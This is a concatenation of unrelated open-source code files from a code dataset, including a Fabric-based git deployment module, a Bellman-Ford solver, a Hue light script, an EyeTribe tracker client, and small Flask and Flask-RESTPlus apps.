os.path.join(repo.working_tree_dir, filepath)\n st = os.lstat(absfilepath)\n blob = git.Blob(repo=repo,\n binsha=git.Blob.NULL_BIN_SHA,\n mode=stat_mode_to_index_mode(st.st_mode),\n path=to_native_path_linux(filepath))\n blob = _git_raw_write_object(repo, blob)\n return blob\n\n\nclass GitFilter(object):\n def __init__(self, repo, index, base_commit):\n self.repo = repo\n self.index = index\n self.base_commit = base_commit\n\n def filter(self):\n raise NotImplementedError('You should create your own apply() method in your own subclass')\n\n def execute(self):\n from git.index.util import TemporaryFileSwap\n\n # Move current index out of the way, as we need to work on the default index file\n index_handler = TemporaryFileSwap(self.index._index_path())\n try:\n self.index.write(self.index._index_path())\n self.filter()\n finally:\n del(index_handler) # release as soon as possible\n return self.index\n\n def add(self, *paths):\n self.index.add(paths)\n\n def remove(self, *paths):\n self.index.remove(\n paths,\n working_tree=False, # just to be sure\n r=True,\n )\n\n @property\n def original_tree(self):\n return self.base_commit.tree\n\n @property\n def filtered_tree(self):\n # Will store tree state to disk, be sure when to call this!\n return self.index.write_tree()\n\n @filtered_tree.setter\n def filtered_tree(self, new_tree):\n warnings.warn(\"Setting the tree directly may cause unexpected results.\")\n # Note: GitFilter moves the index to the default index location for all\n # available methods (like remove) to work as expected. If you change\n # the tree we will switch over to a temporary index. So these methods\n # will then fail to work. THIS IS THE EXPECTED RESULT.\n assert new_tree.binsha\n self.index = git.IndexFile.from_tree(self.repo, new_tree)\n\n def _copy_tree(self, original, additions=None, excludes=None):\n warnings.warn(\"You don't need to copy trees any more, as fabdeploit switched to using git.IndexFile. Will just return original tree.\", PendingDeprecationWarning)\n if additions or excludes:\n raise RuntimeError('Not possible any more, see warning. 
Use GitFilter.add/remove instead.')\n return original\n\n\nclass Git(BaseCommandUtil):\n local_repository_path = None\n remote_repository_path = None\n release_author = None\n release_branch = None\n release_commit_filter_class = None\n\n def __init__(self, **kwargs):\n super(Git, self).__init__(**kwargs)\n self.base_commit = None\n self.release_commit = None\n if self.local_repository_path is None:\n raise RuntimeError('No local_repository_path specified (class or constructor)')\n if self.remote_repository_path is None:\n raise RuntimeError('No remote_repository_path specified (class or constructor)')\n if self.release_branch is None:\n raise RuntimeError('No release_branch specified (class or constructor)')\n self.local_repository_path = os.path.realpath(os.path.abspath(self.local_repository_path))\n\n def _get_local_repo(self):\n try:\n return self._local_repo\n except AttributeError:\n self._local_repo = git.Repo(self.local_repository_path)\n return self._local_repo\n\n def _raw_copy_commit(self, commit, message=None, parents=None, actor=None):\n warnings.warn(\"Will probable be removed with Git.merge_release_back().\", PendingDeprecationWarning)\n # create a new commit reusing the tree (meaning no file changes)\n new_commit = git.Commit(self._get_local_repo(), git.Commit.NULL_BIN_SHA)\n new_commit.tree = commit.tree\n\n # set commit date\n unix_time = int(time())\n offset = altzone\n new_commit.authored_date = unix_time\n new_commit.author_tz_offset = offset\n # make sure we have a somewhat more linear history\n # (gitg and possibly others will get confused otherwise)\n if new_commit.authored_date == commit.authored_date:\n new_commit.authored_date = new_commit.authored_date + 1\n new_commit.committed_date = unix_time\n new_commit.committer_tz_offset = offset\n if new_commit.committed_date == commit.committed_date:\n new_commit.committed_date = new_commit.committed_date + 1\n\n # set author / comitter\n actor = self._get_release_actor(actor)\n new_commit.author = actor\n new_commit.committer = actor\n\n # set commit message\n if message:\n new_commit.message = message\n else:\n new_commit.message = commit.message\n\n # set parents\n new_commit.parents = parents if not parents is None else []\n\n # reuse encoding\n new_commit.encoding = commit.encoding\n return new_commit\n\n def _raw_write_object(self, obj):\n return _git_raw_write_object(self._get_local_repo(), obj)\n\n def _raw_update_branch(self, branch_name, commit):\n repo = self._get_local_repo()\n if not branch_name in repo.heads:\n repo.create_head(branch_name)\n repo.heads[branch_name].commit = commit\n\n def release_deployment_branch(self):\n return 'release/{release_branch}'.format(release_branch=self.release_branch)\n\n def release_deployment_remote_name(self):\n return self.release_deployment_branch()\n\n def pull_origin(self):\n # init repo and config\n repo = self._get_local_repo()\n release_deployment_branch = self.release_deployment_branch()\n\n # update local branches\n if not 'origin' in [_i.name for _i in repo.remotes]:\n raise RuntimeError('No origin exists in remotes')\n\n with fab.lcd(self.local_repository_path):\n fab.local('git fetch origin') # Make sure we fetch all changes\n fab.local('git checkout \"{branch}\"'.format(branch=self.release_branch))\n fab.local('git pull origin \"{branch}\"'.format(branch=self.release_branch))\n if ('origin' in [_i.name for _i in repo.remotes] and\n release_deployment_branch in repo.remotes.origin.refs):\n # We just update our local release branch to the remote version, no 
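GitFilter above is designed to be subclassed with a filter() implementation that mutates the staged index before the release commit is written. A hypothetical subclass as a sketch; the file paths are examples, not taken from the repository:

class StripSecretsFilter(GitFilter):
    """Hypothetical release filter: drop a local settings file from the
    release tree and stage a build artifact instead (paths are examples)."""
    def filter(self):
        self.remove('settings_local.py')      # delegates to IndexFile.remove
        self.add('static/build/app.min.js')   # delegates to IndexFile.add

# Wired up by assigning it on a Git subclass:
#     release_commit_filter_class = StripSecretsFilter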
questions asked\n self._raw_update_branch(release_deployment_branch, repo.remotes.origin.refs[release_deployment_branch])\n\n def pull(self):\n if 'origin' in [_i.name for _i in self._get_local_repo().remotes]:\n self.pull_origin()\n\n def _get_release_actor(self, actor=None):\n if actor is None:\n actor = self.release_author\n if actor:\n if isinstance(actor, basestring):\n actor = git.Actor._from_string(actor)\n else:\n cr = self._get_local_repo().config_reader()\n actor = git.Actor.author(cr)\n return actor\n\n def create_release_commit(self, message=None):\n \"\"\" Creates a new release commit \"\"\"\n\n # init repo, latest commit and config\n repo = self._get_local_repo()\n commit = repo.heads[self.release_branch].commit\n self.base_commit = commit # may be used later again\n release_deployment_branch = self.release_deployment_branch()\n\n # last release commit\n parent = None\n if release_deployment_branch in repo.heads:\n parent = repo.heads[release_deployment_branch].commit\n parents = [parent] if parent else []\n\n # create new commit\n if message is None:\n message = (\n \"Deploying '{commit}' from branch '{release_branch}' \"\n \"into '{deployment_branch}'. Date: {timestamp}\".format(\n commit=commit,\n release_branch=self.release_branch,\n deployment_branch=release_deployment_branch,\n timestamp=datetime.datetime.now().isoformat()))\n\n self.release_commit_index = git.IndexFile.from_tree(repo, self.base_commit.tree)\n self.filter_release_commit()\n\n # write commit\n self.release_commit = self.release_commit_index.commit(\n message=message,\n parent_commits=parents,\n head=False,\n author=self._get_release_actor(),\n committer=self._get_release_actor())\n # update release branch\n self._raw_update_branch(release_deployment_branch, self.release_commit)\n\n return self.release_commit\n\n def filter_release_commit(self):\n # You may write a filter to change the commit after if is initially\n # created. Changes may involve changing the tree (remove, change or\n # add files) or changing the meta data (author, date, message).\n # I think this only should be used for tree filters, as other data may be\n # set before even creating the commit.\n if self.release_commit_filter_class is not None:\n self.release_commit_index = self.release_commit_filter_class(\n self._get_local_repo(),\n self.release_commit_index,\n self.base_commit,\n ).execute()\n\n def tag_release(self, tag_name):\n if self.release_commit is None:\n raise RuntimeError('You should create a release commit first')\n self._get_local_repo().create_tag(tag_name, ref=self.release_commit.hexsha1)\n\n def merge_release_back(self):\n # We reuse the original commit here, as the release commit may be\n # changed by some filter.\n warnings.warn(\"Merging back will be removed some day. 
Please don't depend on it.\", PendingDeprecationWarning)\n if self.base_commit is None or self.release_commit is None:\n raise RuntimeError('You should create a release commit first')\n merge_commit = self._raw_copy_commit(self.base_commit, parents=[self.base_commit, self.release_commit])\n self._raw_write_object(merge_commit)\n assert merge_commit.binsha\n self._raw_update_branch(self.release_branch, merge_commit)\n #merge_index = Index.from_tree(repo, parent, 'HEAD', 'some_branch')\n\n def release(self, message=None, tag_name=None, merge_back=False):\n self.create_release_commit(message=message)\n if tag_name:\n self.tag_release(tag_name)\n if merge_back:\n self.merge_release_back()\n return self.release_commit\n\n def remote_deployment_repository_url(self):\n if self.remote_repository_path[0] == '/':\n return 'ssh://%s@%s:%s%s' % (fab.env.user, fab.env.host, fab.env.port, self.remote_repository_path)\n else:\n return 'ssh://%s@%s:%s/~%s/%s' % (fab.env.user, fab.env.host, fab.env.port, fab.env.user, self.remote_repository_path)\n\n def push_release(self, bare=False):\n \"\"\" Pushes the release branch \"\"\"\n # thanks to https://github.com/dbravender/gitric/blob/master/gitric/api.py\n\n # init repo and config\n repo = self._get_local_repo()\n release_deployment_branch = self.release_deployment_branch()\n release_remote_name = self.release_deployment_remote_name()\n release_remote_url = self.remote_deployment_repository_url()\n\n # initialize remote\n if not release_remote_name in [_i.name for _i in repo.remotes]:\n remote = repo.create_remote(release_remote_name, release_remote_url)\n else:\n remote = repo.remotes[release_remote_name]\n if remote.url != release_remote_url:\n repo.delete_remote(release_remote_name)\n remote = repo.create_remote(release_remote_name, release_remote_url)\n\n # initialize the remote repository (idempotent)\n if bare:\n fab.run('git init --bare \"%s\"' % self.remote_repository_path)\n else:\n fab.run('git init \"%s\"' % self.remote_repository_path)\n # silence git complaints about pushes coming in on the current branch\n # the pushes only seed the immutable object store and do not modify the\n # working copy\n fab.run('GIT_DIR=\"%s/.git\" git config receive.denyCurrentBranch ignore' %\n self.remote_repository_path)\n\n # push to remote\n with fab.lcd(self.local_repository_path):\n fab.local('git push \"{remote}\" \"{branch}\"'.format(\n remote=release_remote_name,\n branch=release_deployment_branch,\n ))\n #remote.push(release_deployment_branch)\n\n def webserver_harden_remote_git(self):\n dotgit_path = self._path_join(self.remote_repository_path, '.git')\n # This does not work with bare repositories. 
This is by design as\n        # bare repositories usually don't get pushed to web server document\n        # roots\n        if not self._exists(dotgit_path):\n            raise IOError('No .git path on server found (%s)' % dotgit_path)\n        self._webserver_harden_remote_git_permissions(dotgit_path)\n        self._webserver_harden_remote_git_htaccess(dotgit_path)\n\n    def _webserver_harden_remote_git_permissions(self, dotgit_path):\n        self._run('chmod 700 \"%s\"' % dotgit_path)\n\n    def _webserver_harden_remote_git_htaccess(self, dotgit_path):\n        htaccess_path = self._path_join(dotgit_path, '.htaccess')\n        self._run('echo \"<IfVersion < 2.4>\" > \"%s\"' % htaccess_path)\n        self._run('echo \"  Satisfy all\" >> \"%s\"' % htaccess_path)\n        self._run('echo \"  Order deny,allow\" >> \"%s\"' % htaccess_path)\n        self._run('echo \"  Deny from all\" >> \"%s\"' % htaccess_path)\n        self._run('echo \"</IfVersion>\" >> \"%s\"' % htaccess_path)\n        self._run('echo \"<IfVersion >= 2.4>\" >> \"%s\"' % htaccess_path)\n        self._run('echo \"  Require all denied\" >> \"%s\"' % htaccess_path)\n        self._run('echo \"</IfVersion>\" >> \"%s\"' % htaccess_path)\n\n    def push_origin(self):\n        # init repo and config\n        repo = self._get_local_repo()\n\n        # push changes\n        if not 'origin' in [_i.name for _i in repo.remotes]:\n            return\n        with fab.lcd(self.local_repository_path):\n            fab.local('git push origin \"{branch}\"'.format(branch=self.release_branch))\n            fab.local('git push origin \"{branch}\"'.format(branch=self.release_deployment_branch()))\n\n    def push(self):\n        if 'origin' in [_i.name for _i in self._get_local_repo().remotes]:\n            self.push_origin()\n        self.push_release()\n\n    def switch_release(self, commit=None, update_to_remote=None):\n        # init repo and latest commit\n        release_deployment_branch = self.release_deployment_branch()\n\n        # use release commit we created just now if possible\n        if commit is None and self.release_commit is not None:\n            commit = self.release_commit\n\n        # Support passing raw git commit objects\n        if isinstance(commit, git.Commit):\n            commit = commit.hexsha\n\n        # checkout changes on remote\n        with fab.cd(self.remote_repository_path):\n            # we switch to the appropriate commit using a normal checkout, this\n            # way git \"knows\" where we are going. Afterwards we reset the working\n            # copy to this version, cleaning possible changes.\n            # if we would just reset the working copy (like gitric does) we would\n            # get a funny state in git. git then resets the branch-pointer to this\n            # revision, meaning git would think we have fallen back behind the\n            # origin some revisions. If we switch branch when doing the reset we\n            # get a diverged warning, because git still thinks our commit belongs\n            # to the original branch.\n            # so we use checkout (detached head) as this covers the actual stage\n            # much better. git now knows we want to fall back to an old revision\n            # and thus does not mix up branch information.\n            # anyways we do a reset before checkout so the working directory is\n            # clean.\n            with fab.settings(warn_only=True):\n                # may fail on initial push\n                fab.run('git reset --hard')\n            if update_to_remote:\n                # THIS IS NOT HOW FABDEPLOIT IS INTENDED TO BE USED\n                # If we have pulled the changes (which fabdeploit does not do by\n                # default) and switch back to the branch (not a particular release\n                # commit) we may have an edge case. The branch may have fallen\n                # behind the remote branch while we stayed at headless commit\n                # checkouts. 
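Assuming the IfVersion reconstruction above is right (the stray '= 2.4>' remnant points at mod_version tags that were stripped during extraction), the generated .htaccess should read roughly:

<IfVersion < 2.4>
  Satisfy all
  Order deny,allow
  Deny from all
</IfVersion>
<IfVersion >= 2.4>
  Require all denied
</IfVersion>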
This means switching directly to the branch would\n # revert a lot of changes, pulling them back in afterwards and\n # by this doing a lot of IO while risking some funny state (and\n # perhaps even conflicts?).\n # So if users want to pull changes and switch back to the branch\n # after some time we need to first reset the (local) branch to the\n # current remote version.\n # If you pass update_to_remote (meaning update_to_remote=\"origin\")\n # switch_release() will do that for you by first comparing the\n # sha1 of the branch to the current HEAD. If both differ we are\n # most probably in headless mode and should update the (local)\n # branch. This is done by calling an update-ref to the remote\n # branch. Afterwards the normal checkout.\n # IF YOU USE THIS YOU HAVE TO FETCH FIRST (SOMEWHERE ELSE)\n # ANYWAYS AGAIN, THIS IS NOT HOW FABDEPLOIT IS INTENDED TO BE USED\n if commit is None or commit == release_deployment_branch:\n head_rev = fab.run('git rev-parse HEAD')\n # not done here, but should look like this\n #fab.run('git fetch \"%s\"' % update_to_remote)\n # switch to headless or make sure we are in headless mode\n fab.run('git checkout \"%s\"' % head_rev)\n # update branch pointer\n fab.run('git update-ref \"refs/heads/%s\" \"refs/remotes/%s/%s\"' % (\n release_deployment_branch,\n update_to_remote,\n release_deployment_branch,\n ))\n # switch to updated branch\n fab.run('git checkout \"%s\"' % release_deployment_branch)\n else:\n # Using the branch should only be done in some obscure edge cases\n # as after we switched to a branch instead of headless checkout\n # the first \"git --reset\" above will apply all file changes. This\n # is not the indented behavior. As of this for the most cases we\n # use the release commit sha1 whenever possible. 
See above.\n                fab.run('git checkout \"%s\"' % (commit if commit else release_deployment_branch))\n            # make sure everything is clean\n            fab.run('git reset --hard')\n\n\n# BACKWARDS COMPATIBILITY\n\n\ndef _legacy_git(git_class=Git):\n    warnings.warn('You are using the legacy function, please switch to class based version', PendingDeprecationWarning)\n\n    fab.require('deploy_git_repository', 'deploy_release_branch', 'deploy_remote_git_repository')\n    return git_class(\n        local_repository_path=fab.env.deploy_git_repository,\n        remote_repository_path=fab.env.deploy_remote_git_repository,\n        release_branch=fab.env.deploy_release_branch,\n        release_author=fab.env.get('deploy_release_author', None),\n    )\n\n\ndef create_release(release_commit_filter=None):\n    if release_commit_filter and callable(release_commit_filter):\n        class FilteredGit(Git):\n            def filter_release_commit(self):\n                release_commit_filter(self.release_commit)\n        git = _legacy_git(FilteredGit)\n    else:\n        git = _legacy_git()\n\n    return git.release(\n        message=fab.env.get('deploy_release_message', None),\n        tag_name=fab.env.get('deploy_release_tag', None),\n        merge_back=fab.env.get('deploy_merge_release_back', False),\n    )\n\n\npull_origin = legacy_wrap(_legacy_git, 'pull_origin')\npush_release = legacy_wrap(_legacy_git, 'push_release')\npush_origin = legacy_wrap(_legacy_git, 'push_origin')\nswitch_release = legacy_wrap(_legacy_git, 'switch_release')\n\n\ndef _git_write_object(repo, obj):\n    warnings.warn('Function was renamed to _git_raw_write_object()', PendingDeprecationWarning)\n\n    return _git_raw_write_object(repo, obj)\n","repo_name":"team23/fabdeploit","sub_path":"fabdeploit/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":21898,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"18567795696","text":"from collections import defaultdict\nimport sys\ninput = sys.stdin.readline\nINF = sys.maxsize\n\ndef BF():\n    D = [INF] * (N + 1)\n    D[1] = 0\n    for i in range(N):\n        for n1 in range(1, N+1):\n            if D[n1] == INF:\n                continue\n            for t, n2 in G[n1]:\n                if D[n2] > t + D[n1]:\n                    D[n2] = t + D[n1]\n                    if i == (N-1):\n                        return True\n    return False\n\nTC = int(input())\nfor _ in range(TC):\n    N, M, W = map(int, input().split())\n    G = defaultdict(list)\n    for _ in range(M):\n        S, E, T = map(int, input().split())\n        G[S].append((T, E))\n        G[E].append((T, S))\n    for _ in range(W):\n        S, E, T = map(int, input().split())\n        G[S].append((-T, E))\n\n    if BF():\n        print('YES')\n    else:\n        print('NO')\n\n# Wherever the start is, it is enough to confirm that a negative cycle exists -> YES...","repo_name":"seunghee73/may-algo-study","sub_path":"0511/1865_hee.py","file_name":"1865_hee.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73876595608","text":"import json\nimport requests\nfrom random import randrange\nimport time\n\n\nurl = \"http://192.168.0.103/api/glybzbW9HU7WbJqfj8yvM5oT66RiUTriPGh4X0A5/lights/1/state\"\n\nhue = 2000\non = True\n\nwhile True:\n    time.sleep(0.001)\n    if hue < 60000:\n        hue = hue+200\n        data_on = {\"on\": True, \"sat\":254,\"bri\":254, \"hue\":hue}\n        r = requests.put(url, json.dumps(data_on), timeout=5)\n        print(\"Hue Color: \", hue, \"/60000\")\n    \n    else:\n        hue = 1\n        data_on = {\"on\": True, \"sat\":254,\"bri\":254, \"hue\":hue}\n        r = requests.put(url, json.dumps(data_on), timeout=5)\n        
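The 1865 solution above initialises only D[1] and relies on a relaxation still succeeding on the N-th pass to signal a negative cycle. A minimal sketch of the same test that seeds every node with distance 0, which is one common way to catch cycles regardless of reachability; the two-node graph is illustrative only.

# Edges (u, v, w); the 1 -> 2 -> 1 loop has total weight 2 + (-3) = -1.
edges = [(1, 2, 2), (2, 1, -3)]
n = 2
dist = [0] * (n + 1)          # start from 0 everywhere so no node is "unreachable"
negative_cycle = False
for i in range(n):
    for u, v, w in edges:
        if dist[v] > dist[u] + w:
            dist[v] = dist[u] + w
            if i == n - 1:    # still relaxing on the n-th pass -> cycle
                negative_cycle = True
print('YES' if negative_cycle else 'NO')  # YES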
print(\"Restart\")\n\n","repo_name":"jonthieboii/hueLight","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5781136247","text":"from PySide import QtCore, QtNetwork\nimport json\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\n# attributes we can get/set on the tracker, except for 'frame'\ntrackerAttributes = ['push', 'heartbeatinterval', 'version', 'trackerstate',\n 'framerate', 'iscalibrated', 'iscalibrating', 'calibresult',\n 'screenindex', 'screenresw', 'screenresh',\n 'screenpsyw', 'screenpsyh']\n\nclass EyeTribe(QtCore.QObject):\n \"\"\"\n EyeTribe client for PySide\n \"\"\"\n newFrame = QtCore.Signal(dict)\n\n # State masks\n STATE_TRACKING_GAZE = 0x1\n STATE_TRACKING_EYES = 0x2\n STATE_TRACKING_PRESENCE = 0x4\n STATE_TRACKING_FAIL = 0x8\n STATE_TRACKING_LOST = 0x10\n\n def __init__(self):\n \"\"\"\n Connect to tracker and get all attribute values\n \"\"\"\n super().__init__()\n self.socket = QtNetwork.QTcpSocket(self)\n self.socket.readyRead.connect(self.handleReadyRead)\n self.socket.stateChanged.connect(lambda state: logger.info('Tracker socket: {}'.format(state)))\n\n self._inBuffer = QtCore.QByteArray()\n self._inBraceCounter = 0\n self._inBraceFlag = False\n\n self._trackerAttributes = {}\n for attr in trackerAttributes:\n self._trackerAttributes[attr] = None\n\n self._heartbeatTimer = QtCore.QTimer(self)\n self._heartbeatTimer.timeout.connect(self.sendHeartbeat)\n\n\n def start(self, ip='127.0.0.1', port=6555):\n self.socket.connectToHost(ip, port)\n self._heartbeatTimer.start(1000)\n\n # Send initial requests: set push and get all attributes\n self.set({\"push\": True, \"version\": 1})\n self.requestGet(trackerAttributes)\n\n def stop(self):\n self._heartbeatTimer.stop()\n self.socket.disconnectFromHost()\n\n def sendMessage(self, category, request=None, values=None):\n msg = {'category': category}\n if request is not None:\n msg['request'] = request\n if values is not None:\n msg['values'] = values\n\n# logger.debug('Request: {}'.format(msg))\n json.dump(msg, self.socket)\n\n def sendHeartbeat(self):\n self.sendMessage('heartbeat')\n\n def handleReadyRead(self):\n \"\"\"\n Read from the socket, one byte at a time, until a valid JSON object is found.\n \n We judge the end of the JSON object by counting braces. 
For simplicity assume EyeTribe\n        sends no braces within strings.\n        \"\"\"\n        while self.socket.bytesAvailable():\n            c = self.socket.read(1)\n            self._inBuffer.append(c)\n            if c == '{':\n                self._inBraceCounter += 1\n                self._inBraceFlag = True\n            elif c == '}':\n                self._inBraceCounter -= 1\n                if self._inBraceCounter < 0:\n                    raise Exception('Bad response received: too many closing braces')\n            if self._inBraceFlag and self._inBraceCounter == 0:\n                # A complete response!\n                self._inBraceFlag = False\n                self.handleResponse(json.loads(str(self._inBuffer)))\n                self._inBuffer.clear()\n\n    def get(self, attr):\n        \"\"\"\n        Get the latest value of a tracker attribute\n        \"\"\"\n        return self._trackerAttributes[attr]\n\n    def requestGet(self, attr):\n        \"\"\"\n        Send a new request for tracker attributes\n        \"\"\"\n        if not isinstance(attr, list):\n            attr = [attr]\n        self.sendMessage('tracker', 'get', attr)\n\n    def set(self, attr, value=None):\n        \"\"\"\n        Set the value of a tracker attribute via a new request\n        If attr is a dict of name:value pairs, set all of them.\n        \"\"\"\n        if value is not None:\n            attr = {attr: value}\n\n        for name, value in attr.items():\n            self._trackerAttributes[name] = value\n        self.sendMessage('tracker', 'set', attr)\n\n    def handleResponse(self, resp):\n        \"\"\"\n        Take one complete resp (one JSON object) and parse it,\n        and emit a signal if needed\n        \"\"\"\n        logger.debug('Response: {}'.format(resp))\n\n        if resp['statuscode'] == 200:\n            if resp['category'] == 'tracker':\n                if resp['request'] == 'get':\n                    for k, v in resp['values'].items():\n                        # assign tracker attributes to self\n                        self._trackerAttributes[k] = v\n                    if 'heartbeatinterval' in resp['values']:\n                        self._heartbeatTimer.setInterval(resp['values']['heartbeatinterval'])\n                    if 'frame' in resp['values']:\n                        self.handleFrame(resp['values']['frame'])\n                elif resp['request'] == 'set':\n                    # All good - new values have already been set\n                    pass\n            elif resp['category'] == 'calibration':\n                pass\n            elif resp['category'] == 'heartbeat':\n                pass\n        elif resp['statuscode'] == 800:\n            # Calibration change\n            self.sendMessage('tracker', 'get', ['iscalibrated', 'iscalibrating', 'calibresult'])\n        elif resp['statuscode'] == 801:\n            # Display change\n            self.sendMessage('tracker', 'get', ['screenindex', 'screenresw', 'screenresh',\n                                                'screenpsyw', 'screenpsyh'])\n        elif resp['statuscode'] == 802:\n            # Tracker state change\n            self.sendMessage('tracker', 'get', ['trackerstate'])\n        else:\n            # some error\n            try:\n                raise Exception('Tracker returned {}: {}'.format(resp['statuscode'], resp['values']['statusmessage']))\n            except KeyError:\n                raise Exception('Tracker returned {}'.format(resp['statuscode']))\n        return None\n\n    def handleFrame(self, frame):\n        \"\"\"\n        Handle a new received frame:\n        Emit a signal with the latest frame object (a dict)\n        \"\"\"\n        self.newFrame.emit(frame)\n\nif __name__ == '__main__':\n    from PySide.QtGui import QApplication\n    import sys\n    qt_app = QApplication(sys.argv)\n    testClient = EyeTribe()\n    qt_app.exec_()\n\n\n\n\n","repo_name":"leokoppel/gazecontour","sub_path":"gazecontour/eyetribe.py","file_name":"eyetribe.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5502107760","text":"from flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\n# List holding registered user records\nusers = []\n\n# List holding post data\nposts = []\n\n@app.route('/')\ndef index():\n    return redirect('/register')\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n    
if request.method == 'POST':\n        id = request.form['id']\n        password = request.form['password']\n        age = request.form['age']\n        location = request.form['location']\n        email = request.form['email']\n\n        # Store the member info as a dictionary\n        user = {\n            'id': id,\n            'password': password,\n            'age': age,\n            'location': location,\n            'email': email\n        }\n\n        # Save the member info\n        users.append(user)\n\n        # Redirect to the success page once registration is complete\n        return redirect('/success')\n\n    return render_template('register.html')\n\n@app.route('/success')\ndef success():\n    return render_template('success.html')\n\n@app.route('/posts', methods=['GET'])\ndef post_list():\n    return render_template('post_list.html', posts=posts)\n\n@app.route('/posts/create', methods=['GET', 'POST'])\ndef create_post():\n    if request.method == 'POST':\n        title = request.form['title']\n        content = request.form['content']\n        post = {'title': title, 'content': content}\n        posts.append(post)\n        return redirect(url_for('post_list'))\n    return render_template('create_post.html')\n\n@app.route('/posts/<int:post_id>', methods=['GET'])\ndef view_post(post_id):\n    if post_id < len(posts):\n        post = posts[post_id]\n        return render_template('view_post.html', post=post)\n    return \"Post not found\"\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"NoskeLim/OSS_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13946518269","text":"from flask_restplus import fields, Resource\nfrom cluster.api.restplus import api\nfrom cluster.api.dbquery import all_for_marker, all_for_marker_dotplot\nns = api.namespace('marker')\n\n# marker table fields we are exposing as requestable values.\nmarker_fields = [\"sensitivity\", \"specificity\", \"accuracy\", \"precision\", \"recall\", \"t_stat\", \"z_stat\",\n                 \"log2_fold_change_vs_next\", \"log2_fold_change_vs_min\", \"mean_expression\"]\ndotplot_color_fields = marker_fields[5:]\ndotplot_size_fields = marker_fields[:5]\n\nmarker_values = fields.String(\n    required=True,\n    description=\"Values stored for a marker gene.\",\n    enum=marker_fields\n)\n\ndotplot_color_values = fields.String(\n    required=True,\n    description=\"Values available for circle color in dotplot.\",\n    enum=dotplot_color_fields\n)\n\ndotplot_size_values = fields.String(\n    required=True,\n    description=\"Values available for circle size in dotplot.\",\n    enum=dotplot_size_fields\n)\n\ncluster_name = fields.String(required=True, description='Name of the cluster a circle represents.')\n\n\ncluster_dotplot_model = api.model(\"marker-dotplot-values\", {\n    'name': cluster_name,\n    \"size\": fields.Float(description='Value represented as the size of the circle in a marker vis.'),\n    \"color\": fields.Float(description='Value represented as the color of the circle in a marker vis.'),\n    \"cell_count\": fields.Integer(description=\"Number of cells in the cluster.\")\n})\n\ndataset_model = api.model(\"dataset_model\", {\n    \"name\": fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n    \"species\": fields.String(required=True, description='None'),\n    \"study\": fields.String(required=True, description='None'),\n    \"organ\": fields.String(required=True, description='None'),\n})\ncluster_solutions_dotplot_model = api.model('marker-dotplot-clusters', {\n    'dataset': fields.Nested(dataset_model),\n    'cluster_solution_name': fields.String(required=True, description='Name of the cluster solution'),\n    'clusters': 
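A quick smoke test for the routes above. This sketch assumes the module is importable as app (the record's sub_path is app.py); the form values are illustrative. The POST handlers only redirect, so no templates are needed for these checks.

from app import app, users, posts

client = app.test_client()
assert client.get('/').status_code == 302   # '/' redirects to /register
client.post('/register', data={'id': 'demo', 'password': 'pw', 'age': '30',
                               'location': 'Seoul', 'email': 'demo@example.com'})
assert users[-1]['id'] == 'demo'            # registration appended the user dict
client.post('/posts/create', data={'title': 'hello', 'content': 'world'})
assert posts[-1] == {'title': 'hello', 'content': 'world'}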
fields.List(fields.Nested(cluster_dotplot_model))\n})\n\nall_dotplot_model = api.model('marker-dotplot-cluster-solutions',{\n    'gene': fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n    \"size_by\": dotplot_size_values,\n    \"color_by\": dotplot_color_values,\n    \"cluster_solutions\": fields.List(fields.Nested(cluster_solutions_dotplot_model))\n\n})\n\n###############################\n# Defined for the /marker/<name>/<variable> endpoint\ncluster_var_model = api.model('marker-values', {\n    'name': cluster_name,\n    'value': fields.Float(description='Value of a marker in a given cluster.'),\n    }\n)\n\nmarker_model = api.model('marker-clusters', {\n    'dataset_name': fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n    'cluster_solution_name': fields.String(required=True, description='Name of the cluster solution'),\n    'clusters': fields.List(fields.Nested(cluster_var_model))\n})\n\nall_markers_model = api.model('marker-cluster-solutions',{\n    'gene': fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n    \"variable\": fields.String(required=True, description='Name of variable requested for the markers.'),\n    \"cluster_solutions\": fields.List(fields.Nested(marker_model))\n\n})\n#####################################\n\n@ns.route('/<string:name>/<string:variable>')\n@ns.param('name', 'Marker gene name, hugo or ensembl')\n@ns.param('variable', 'The variable type one of (X, X, X, X)')\nclass SingleMarkerVar(Resource):\n    @api.marshal_with(all_markers_model, envelope=\"resource\")\n    @ns.response(200, 'marker gene')\n    def get(self, name, variable):\n        \"\"\"A list of clustering solutions for a given marker and marker value.\"\"\"\n        return all_for_marker(name, variable)\n\n\n@ns.route('/<string:name>/dotplot/<string:size>/<string:color>')\n@ns.param('name', 'Marker gene name, hugo or ensembl')\n@ns.param('size', 'The variable to use as the size of circles')\n@ns.param('color', 'The variable to use for the color of circles')\nclass Marker(Resource):\n    @api.marshal_with(all_dotplot_model, envelope=\"resource\")\n    @ns.response(200, 'dotplot values for marker gene')\n    def get(self, name, size, color):\n        \"\"\"A list of dot plot ready clustering solutions for a given marker with a size and color variable.\"\"\"\n        return all_for_marker_dotplot(name, size, color)","repo_name":"Stuartlab-UCSC/cluster-db","sub_path":"cluster/api/marker.py","file_name":"marker.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18510923628","text":"import tkinter as tk\nfrom libraries.utils.utils import capfirst\nfrom libraries.utils.languageHandler import LanguageHandler\nfrom libraries.utils.windowSpecs import WindowSpecs\nfrom 